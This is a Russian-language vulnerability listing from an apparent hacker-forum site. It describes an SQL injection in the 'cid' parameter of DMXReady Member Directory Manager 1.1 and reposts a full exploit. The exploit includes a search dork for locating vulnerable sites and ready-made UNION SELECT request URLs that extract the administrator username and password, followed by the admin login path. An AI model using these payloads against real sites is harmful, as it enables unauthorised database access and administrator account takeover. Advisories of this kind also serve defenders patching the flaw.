Сниффер Bugtraq Файлы Статьи Новости
 
Форум [ ssl ]   Друзья   О Клубе          

Последнее на Форуме

Пожертвования

Пожертвуйте на развитие проекта
через смс
Кошельки WebMoney:
Z583322939655
E121331800314
R274644017049

Контакты

Связь с Администрацией

hpcteam1[@]gmail.com

Bugtraq rss

[ Добавить Материал ]

SQL-инъекция в DMXReady Member Directory Manager


Bugtraq /

Программа: DMXReady Member Directory Manager 1.1

Описание:

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «cid» сценарием upload_image_category.asp. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.

Эксплоит:

******************************************************************************* # Title : DMXReady Member Directory Manager <= 1.1 SQL Injection Vulnerability # Author : ajann # Contact : :( # S.Page : http://www.dmxready.com # $$ : 99.97 $ # Dork : inurl:inc_memberdirectorymanager.asp # DorkEx : http://www.google.com.tr/search?hl=tr&q=inurl%3Ainc_memberdirectorymanager.asp&meta= ****Stop Attack ABD and ISRAEL ! ******************************************************************************* ******************************************************************************* [[SQL]]]--------------------------------------------------------- http://[target]/[path]//admin/MemberDirectoryManager/components/CategoryManager/upload_image_category.asp?cid=[SQL Inject] You Find-> http://[target]/[path]/applications/MemberDirectoryManager/inc_memberdirectorymanager.asp Edit -> http://[target]/[path]/admin/MemberDirectoryManager/components/CategoryManager/upload_image_category.asp?cid=[SQL Inject] Example: USERNAME-> /admin/MemberDirectoryManager/components/CategoryManager/upload_image_category.asp?cid=-1231312 union select 6,Security_AdminUserName,4,3,2,1 from tblMDM_config PASSWORD-> /admin/MemberDirectoryManager/components/CategoryManager/upload_image_category.asp?cid=-1231312 union select 6,Security_AdminPassword,4,3,2,1 from tblMDM_config Admin Login-> /admin/MemberDirectoryManager/admin.asp [[/SQL]] \"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\" # ajann,Turkey

Комментарии(0)

Дата: 2009-01-14 21:33:55

Добавить Комментарий к Материалу

Вы должны быть авторизованы на форуме чтобы добавлять комментарии. Регистрация

Комментариев к Материалу пока нету. Вы будете первый, кто оставит здесь комментарий


Облачко

Последнее на Сайте

Новости

Статьи

Файлы

Bugtraq

службы мониторинга серверов

Copyright © 2008 - 2010 «HACKER-PRO CLUB». При копировании материалов ставьте ссылку на источник.
Все материалы представлены только в ознакомительных целях, администрация за их использование ответственности не несет.
hacker-pro.net engine v. 3.1 Coded by SokoL Пользовательское соглашение Реклама на сайте